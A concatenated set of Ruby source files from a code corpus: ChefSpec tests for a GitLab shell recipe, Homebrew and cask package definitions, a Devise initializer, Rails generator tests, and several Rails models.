ActiveRecord::Base.acting_user = current_user
end
end
end
end
| 25.072993 | 147 | 0.513828 |
3869d025813c73e6ecb1032bf507b78537642725 | 7,289 | require 'spec_helper'
describe "gitlab::gitlab_shell_install" do
let(:chef_run) { ChefSpec::Runner.new.converge("gitlab::gitlab_shell_install") }
describe "under ubuntu" do
["14.04", "12.04", "10.04"].each do |version|
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "ubuntu", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/home/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/home/git",
url: "http://localhost:80/",
repos_path: "/home/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "6379",
redis_database: nil,
redis_port: "0",
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/repositories").with(
user: 'git',
group: 'git',
mode: 02770
)
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/.ssh").with(
user: 'git',
group: 'git',
mode: 0700
)
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/home/git/.ssh/authorized_keys").with(
user: 'git',
group: 'git',
mode: 0600
)
end
it 'does not run a execute to install gitlab shell on its own' do
expect(chef_run).to_not run_execute('gitlab-shell install')
end
describe "when customizing gitlab user home" do
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "ubuntu", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.node.set['gitlab']['home'] = "/data/git"
runner.node.set['gitlab']['redis_database'] = 2
runner.node.set['gitlab']['redis_unixsocket'] = "/var/run/redis/sockets/redis.sock"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/data/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/data/git",
url: "http://localhost:80/",
repos_path: "/data/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "0",
redis_database: 2,
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/repositories")
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/.ssh")
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/data/git/.ssh/authorized_keys")
end
end
end
end
describe "under centos" do
["5.8", "6.4"].each do |version|
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "centos", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.node.set['gitlab']['redis_database'] = 3
runner.node.set['gitlab']['redis_unixsocket'] = "/var/run/redis/sockets/redis.sock"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/home/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/home/git",
url: "http://localhost:80/",
repos_path: "/home/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "0",
redis_database: 3,
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/repositories").with(
user: 'git',
group: 'git',
mode: 02770
)
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/.ssh").with(
user: 'git',
group: 'git',
mode: 0700
)
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/home/git/.ssh/authorized_keys").with(
user: 'git',
group: 'git',
mode: 0600
)
end
it 'does not run a execute to install gitlab shell on its own' do
expect(chef_run).to_not run_execute('gitlab-shell install')
end
describe "when customizing gitlab user home" do
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "centos", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.node.set['gitlab']['home'] = "/data/git"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/data/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/data/git",
url: "http://localhost:80/",
repos_path: "/data/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "6379",
redis_database: nil,
redis_port: "0",
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/repositories")
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/.ssh")
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/data/git/.ssh/authorized_keys")
end
end
end
end
end
| 35.21256 | 93 | 0.572232 |
b917cd9f17a6c2886cccfc5e3083b6eb788fa73b | 846 | class Torsocks < Formula
homepage "https://gitweb.torproject.org/torsocks.git/"
url "https://git.torproject.org/torsocks.git",
:tag => "v2.0.0",
:revision => "ea105bb76ea1e9f9660dd2307639b75ca6d76569"
head "https://git.torproject.org/torsocks.git"
bottle do
sha1 "75a53b9a12c5f3b1dbcdfd659f9bdecf6703a2f8" => :yosemite
sha1 "02573816190ad4fa6ee829e59b293224a90b6dad" => :mavericks
sha1 "d10034aa108b8a4baf2a6ecd73457cf279681eb3" => :mountain_lion
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
def install
system "./autogen.sh"
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
test do
system "#{bin}/torsocks", "--help"
end
end
| 28.2 | 77 | 0.676123 |
085ee77c09d6f679edc2a4bf54ebbb054776b7b0 | 13,225 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = 'f413862e73af5689833cd0efd29a41e989130688bbd96303ac9bcc00d032ef8e0c8991164bb244924887754dae9b08811e3451f6b686d2ad871e4060f0eb96a0'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '32617d42227184c8faa84f1bf435cd585042e62be6acb520420bcca3f5177475357c6abbc46a035e95b1c457ab8da73e778e09ca028d42d1598d8cb06ee570f9'
# Send a notification email when the user's password is changed
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 49.163569 | 154 | 0.751153 |
bf05b8f1ba7c50e3f1d7d2b5e4b5511fe28393b3 | 1,931 | cask 'steelseries-engine' do
version '3.17.0'
sha256 '913620d8666cd8bdd48c00ab94c4ffb4d8cae2e4160f270bbb98cb02fbd9d116'
# steelseriescdn.com was verified as official when first introduced to the cask
url "https://downloads.steelseriescdn.com/drivers/engine/SteelSeriesEngine#{version}.pkg"
appcast 'https://steelseries.com/engine'
name "SteelSeries Engine #{version.major}"
homepage 'https://steelseries.com/engine'
auto_updates
depends_on macos: '>= :yosemite'
pkg "SteelSeriesEngine#{version}.pkg"
uninstall launchctl: 'com.steelseries.SSENext',
quit: [
"com.steelseries.SteelSeries-Engine-#{version.major}",
'com.steelseries.ssenext.client.*',
'com.steelseries.ssenext.uninstaller',
],
kext: 'com.steelseries.ssenext.driver',
script: [
executable: "/Applications/SteelSeries Engine #{version.major}/SteelSeries Engine #{version.major} Uninstaller.app/Contents/Resources/Uninstall.sh",
sudo: true,
],
pkgutil: 'com.steelseries.*',
delete: "/Library/Application Support/SteelSeries Engine #{version.major}"
zap trash: [
"~/Library/Application Support/steelseries-engine-#{version.major}-client",
"~/Library/Caches/com.steelseries.SteelSeries-Engine-#{version.major}",
"~/Library/Logs/SteelSeries Engine #{version.major} Client",
"~/Library/Preferences/com.steelseries.SteelSeries-Engine-#{version.major}.plist",
'~/Library/Preferences/com.steelseries.ssenext.client.helper.plist',
'~/Library/Preferences/com.steelseries.ssenext.client.plist',
'~/Library/Saved Application State/com.steelseries.ssenext.client.savedState',
]
end
| 48.275 | 173 | 0.626618 |
61497cd2030b1946d3d9c7bd85e9bd27b08f2548 | 74 | class BienvenidoController < ApplicationController
def index
end
end
| 8.222222 | 50 | 0.810811 |
26eadf465b2270925c2c9fe20d2f7be2564e24f6 | 8,352 | require File.dirname(__FILE__) + '/test_helper'
class TestRailsGenerator < Test::Unit::TestCase
context "a rails generator with one empty goal" do
setup do
@app = App.new("foobar")
@app.route :posts
@generator = @app.generator(Rails)
end
should "have a generate method" do
assert @generator.respond_to?(:generate)
end
should "produce a valid string for generate routes" do
assert_match "map.resources :posts", @generator.gen_string("routes")
assert_match "map.root :controller => 'posts'", @generator.gen_string("routes")
end
end
context "a rails generator with a nested route " do
setup do
@app = App.new("foobar")
@app.route [:posts, :comments]
@generator = @app.generator(Rails)
end
should "produce a valid route string" do
assert_match "map.resources :posts do |post|", @generator.gen_string("routes")
assert_match "post.resources :comments", @generator.gen_string("routes")
assert_match "map.root :controller => 'posts'", @generator.gen_string("routes")
end
end
context "a rails generator with a rootless route " do
setup do
@app = App.new("foobar")
@app.route [:posts, :comments], :pictures
@generator = @app.generator(Rails)
end
should "produce a valid route string" do
assert_match "map.resources :posts do |post|", @generator.gen_string("routes")
assert_match "map.resources :pictures", @generator.gen_string("routes")
assert_match "post.resources :comments", @generator.gen_string("routes")
assert_no_match /map.root :controller => 'posts'/, @generator.gen_string("routes")
end
end
context "a rails generator with nested nontrivial goals" do
setup do
@app = App.new("foobar")
@app.route [:posts, :comments], :pictures
@app.add_attrs :posts => "body:text title:string", :comments => "body:text", :pictures => "rating:integer"
@generator = @app.generator(Rails)
end
should "generate valid routes" do
assert_match /map.resources :posts/, @generator.gen_string("routes")
end
should "generate correct collection_path" do
assert_equal "post_comments_path(@post)", @generator.collection_path(Comment)
end
should "produce a valid migration"do
assert_match /text :body/, @generator.gen_string("migration", Post)
end
should "produce a valid string for the model" do
assert_match /class Post < ActiveRecord::Base/, @generator.gen_string("model", @app.goals["post"])
assert_match /has_many :comments/, @generator.gen_string("model", @app.goals["post"])
assert_match /belongs_to :post/, @generator.gen_string("model", @app.goals["comment"])
assert_match /validates_presence_of :post/, @generator.gen_string("model", @app.goals["comment"])
end
should "produce a valid string for the controller" do
assert_match /def find_comment/, @generator.gen_string("controller", @app.goals["comment"])
assert_match /def find_post/, @generator.gen_string("controller", @app.goals["post"])
end
should "produce a valid string for the index view" do
assert_match /render :partial => 'comments\/comment', :collection => @comments/, @generator.gen_string("index", @app.goals["comment"])
end
should "produce a valid string for the show view" do
assert_match /render :partial => 'comments\/comment', :object => @comment/, @generator.gen_string("show", @app.goals["comment"])
end
should "produce a valid string for the _model view" do
assert_match /div_for\(post\) do /, @generator.gen_string("_model", @app.goals["post"])
#assert_match /render :partial => 'comments\/comment', :object => @comment/, @generator.gen_partial_str(@app.goals["post"])
end
should "produce a valid string for the _model_small view" do
assert_match /div_for\(post_small\) do /, @generator.gen_string("_model_small", @app.goals["post"])
end
should "produce a valid string for the _form view" do
assert_match /form_for..form/, @generator.gen_string("_form", @app.goals["post"])
end
should_eventually "produce a valid string for the edit view" do
assert_match /render :partial => 'comments\/form', :object => @comment/, @generator.gen_edit_str(@app.goals["comment"])
end
should_eventually "produce a valid string for the new view" do
assert_match /render :partial => 'comments\/form', :object => @comment/, @generator.gen_new_str(@app.goals["comment"])
end
should "produce a valid string for the unit test"
should "produce a valid string for the functional test" do
#assert_match /xzy/, @generator.gen_controller_test_string(Comment)
end
should_eventually "produce a valid string for the view layout" do
# the layout is presently copied, not generated through ERB.
assert_match /<html/, @generator.gen_layout_str
assert_match /<\/html>/, @generator.gen_layout_str
assert_match /<\/head>/, @generator.gen_layout_str
assert_match /yield /, @generator.gen_layout_str
end
should "generate an app_name, possibly with a suffix" do
assert_equal @generator.app_name, "foobar"
@generator.opts[:base_dir_suffix] = true
assert_equal @generator.app_name, "foobar_rails"
end
should "have an app_dir, possibly with a root dir"do
assert_equal @generator.app_dir, "foobar"
@generator.root_dir = "blah"
assert_equal @generator.app_dir, "blah/foobar"
end
context "and cleaned out tmp directory" do
setup do
@tmp_dir = File.join(File.dirname(__FILE__), 'tmp')
@generator.root_dir = @tmp_dir
FileUtils.rm_rf(@tmp_dir)
assert ! File.exists?(@tmp_dir)
@generator.generate
assert File.exists?(@tmp_dir)
end
teardown do
FileUtils.rm_rf(@tmp_dir)
end
should "generate a rails app skeleton" do
assert File.exists?(@tmp_dir + "/foobar") # checking a random selection of generated rails files.
assert File.exists?(@tmp_dir + "/foobar/config")
assert File.exists?(@tmp_dir + "/foobar/app")
assert File.exists?(@tmp_dir + "/foobar/db")
assert File.exists?(@tmp_dir + "/foobar/db/migrate")
end
should "generate a bunch of migrations on" do
[:posts, :comments, :pictures].each do |x|
assert !Dir.glob("#{@tmp_dir}/foobar/db/migrate/*#{x.to_s}*").blank?
end
end
should "generate model files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/app/models/#{x.to_s.singularize}.rb")
end
end
should "generate controller files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/app/controllers/#{x}_controller.rb")
end
end
should "generate view files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/show.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/index.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/edit.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/new.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/_form.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/_#{x.to_s.singularize}_small.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/_#{x.to_s.singularize}.html.erb")
end
end
should "generate test files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/test/unit/#{x.to_s.singularize}_test.rb")
assert File.exists?("#{@tmp_dir}/foobar/test/functional/#{x}_controller_test.rb")
end
end
should "make a rails project that passes tests" do
current_dir = `pwd`.chomp
FileUtils.cd @generator.app_dir
`rake db:create:all`
`rake db:migrate`
s = `rake test`
assert_match /0 failures, 0 errors/, s
`rake db:drop:all`
FileUtils.cd current_dir
end
end
end
end
| 39.961722 | 140 | 0.650263 |
e9d3a82ba15b3c6112c89816801b17a739cd7a57 | 3,150 | class ProjectMember < Member
SOURCE_TYPE = 'Project'
include Gitlab::ShellAdapter
belongs_to :project, class_name: 'Project', foreign_key: 'source_id'
# Make sure project member points only to project as it source
default_value_for :source_type, SOURCE_TYPE
validates_format_of :source_type, with: /\AProject\z/
default_scope { where(source_type: SOURCE_TYPE) }
scope :in_project, ->(project) { where(source_id: project.id) }
before_destroy :delete_member_todos
class << self
# Add users to project teams with passed access option
#
# access can be an integer representing a access code
# or symbol like :master representing role
#
# Ex.
# add_users_into_projects(
# project_ids,
# user_ids,
# ProjectMember::MASTER
# )
#
# add_users_into_projects(
# project_ids,
# user_ids,
# :master
# )
#
def add_users_into_projects(project_ids, user_ids, access, current_user = nil)
access_level = if roles_hash.has_key?(access)
roles_hash[access]
elsif roles_hash.values.include?(access.to_i)
access
else
raise "Non valid access"
end
users = user_ids.map { |user_id| Member.user_for_id(user_id) }
ProjectMember.transaction do
project_ids.each do |project_id|
project = Project.find(project_id)
users.each do |user|
Member.add_user(project.project_members, user, access_level, current_user)
end
end
end
true
rescue
false
end
def truncate_teams(project_ids)
ProjectMember.transaction do
members = ProjectMember.where(source_id: project_ids)
members.each do |member|
member.destroy
end
end
true
rescue
false
end
def truncate_team(project)
truncate_teams [project.id]
end
def roles_hash
Gitlab::Access.sym_options
end
def access_level_roles
Gitlab::Access.options
end
end
def access_field
access_level
end
def project
source
end
def owner?
project.owner == user
end
private
def delete_member_todos
user.todos.where(project_id: source_id).destroy_all if user
end
def send_invite
notification_service.invite_project_member(self, @raw_invite_token)
super
end
def post_create_hook
unless owner?
event_service.join_project(self.project, self.user)
notification_service.new_project_member(self)
end
super
end
def post_update_hook
if access_level_changed?
notification_service.update_project_member(self)
end
super
end
def post_destroy_hook
event_service.leave_project(self.project, self.user)
super
end
def after_accept_invite
notification_service.accept_project_invite(self)
super
end
def after_decline_invite
notification_service.decline_project_invite(self)
super
end
def event_service
EventCreateService.new
end
end
| 20.588235 | 86 | 0.653016 |
260b5cf0ade12dad42f6f38f30e89afc36a1ecc5 | 3,245 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Config::Entry::Factory do
describe '#create!' do
before do
stub_const('Script', Class.new(Gitlab::Config::Entry::Node))
Script.class_eval do
include Gitlab::Config::Entry::Validatable
validations do
validates :config, array_of_strings: true
end
end
end
let(:entry) { Script }
let(:factory) { described_class.new(entry) }
context 'when setting a concrete value' do
it 'creates entry with valid value' do
entry = factory
.value(%w(ls pwd))
.create!
expect(entry.value).to eq %w(ls pwd)
end
context 'when setting description' do
before do
factory
.value(%w(ls pwd))
.with(description: 'test description')
end
it 'configures description' do
expect(factory.description).to eq 'test description'
end
it 'creates entry with description' do
entry = factory.create!
expect(entry.value).to eq %w(ls pwd)
expect(entry.description).to eq 'test description'
end
end
context 'when setting inherit' do
before do
factory
.value(%w(ls pwd))
.with(inherit: true)
end
it 'makes object inheritable' do
expect(factory.inheritable?).to eq true
end
end
context 'when setting key' do
it 'creates entry with custom key' do
entry = factory
.value(%w(ls pwd))
.with(key: 'test key')
.create!
expect(entry.key).to eq 'test key'
end
end
context 'when setting a parent' do
let(:object) { Object.new }
it 'creates entry with valid parent' do
entry = factory
.value('ls')
.with(parent: object)
.create!
expect(entry.parent).to eq object
end
end
end
context 'when not setting a value' do
it 'raises error' do
expect { factory.create! }.to raise_error(
Gitlab::Config::Entry::Factory::InvalidFactory
)
end
end
context 'when creating entry with nil value' do
it 'creates an unspecified entry' do
entry = factory
.value(nil)
.create!
expect(entry)
.not_to be_specified
end
end
context 'when passing metadata' do
let(:entry) { spy('entry') }
it 'passes metadata as a parameter' do
factory
.value('some value')
.metadata(some: 'hash')
.create!
expect(entry).to have_received(:new)
.with('some value', { some: 'hash' })
end
end
context 'when setting deprecation information' do
it 'passes deprecation as a parameter' do
entry = factory
.value('some value')
.with(deprecation: { deprecated: '10.0', warning: '10.1', removed: '11.0', documentation: 'docs' })
.create!
expect(entry.deprecation).to eq({ deprecated: '10.0', warning: '10.1', removed: '11.0', documentation: 'docs' })
end
end
end
end
| 24.770992 | 120 | 0.557165 |
1a0f61463db0542e7b8d82176127bd32b2a8e3a4 | 1,664 | class PaymentAddress < ActiveRecord::Base
include Currencible
belongs_to :account
after_commit :gen_address, on: :create
has_many :transactions, class_name: 'PaymentTransaction', foreign_key: 'address', primary_key: 'address'
validates_uniqueness_of :address, allow_nil: true
def gen_address
payload = { payment_address_id: id, currency: currency }
attrs = { persistent: true }
AMQPQueue.enqueue(:deposit_coin_address, payload, attrs)
end
def memo
address && address.split('|', 2).last
end
def deposit_address
currency_obj[:deposit_account] || address
end
def as_json(options = {})
{
account_id: account_id,
deposit_address: deposit_address
}.merge(options)
end
def trigger_deposit_address
::Pusher["private-#{account.member.sn}"].trigger_async('deposit_address', {type: 'create', attributes: as_json})
end
def self.construct_memo(obj)
member = obj.is_a?(Account) ? obj.member : obj
checksum = member.created_at.to_i.to_s[-3..-1]
"#{member.id}#{checksum}"
end
def self.destruct_memo(memo)
member_id = memo[0...-3]
checksum = memo[-3..-1]
member = Member.find_by_id member_id
return nil unless member
return nil unless member.created_at.to_i.to_s[-3..-1] == checksum
member
end
def to_json
{address: deposit_address}
end
end
# == Schema Information
# Schema version: 20180215144645
#
# Table name: payment_addresses
#
# id :integer not null, primary key
# account_id :integer
# address :string(255)
# created_at :datetime
# updated_at :datetime
# currency :integer
# secret :string(255)
#
| 23.43662 | 116 | 0.686899 |
bf7f9f5db7b67553eb349937e349c8a9c70ac4d4 | 122 | require 'rails_helper'
RSpec.describe TopicNotification, type: :model do
it { should validate_presence_of :topic }
end
| 20.333333 | 49 | 0.786885 |
6ad52dfd8ff56da52a9df6dbfc897ad692570c61 | 279 | class CreateCourses < ActiveRecord::Migration
def self.up
create_table :courses do |t|
t.string :grade
t.string :section
t.string :code
t.references :academic_year
t.timestamps
end
end
def self.down
drop_table :courses
end
end
| 16.411765 | 45 | 0.65233 |
3853da35b8816e8c9500fefb45538fff39171638 | 629 | # frozen_string_literal: true
require "rails_helper"
module WasteExemptionsEngine
RSpec.describe RenewingRegistration, type: :model do
describe "#workflow_state" do
it_behaves_like "a postcode transition",
previous_state: :site_grid_reference_form,
address_type: "site",
factory: :renewing_registration
it_behaves_like "a postcode transition",
previous_state: :is_a_farmer_form,
address_type: "site",
factory: :renewing_registration_with_manual_site_address
end
end
end
| 31.45 | 78 | 0.631161 |
e87184480d259d3761032b21d4323e3652e02646 | 292 | {
'info' => {
'api_server' => '',
'api_username' => '',
'api_password' => '',
'space_slug' => '',
'enable_debug_logging' => 'true'
},
'parameters' => {
'error_handling' => 'Error Message',
'space_slug' => '',
'team_name' => 'Testing',
}
}
| 19.466667 | 41 | 0.458904 |
1c33d6b04278ed9ccf352da88445debc0e4f6556 | 1,666 | module Bot
module DiscordCommands
# Urban Dictionary
module Urban
extend Discordrb::Commands::CommandContainer
class UrbanDictionary::Definition
def long_text?
text.length > 1024
end
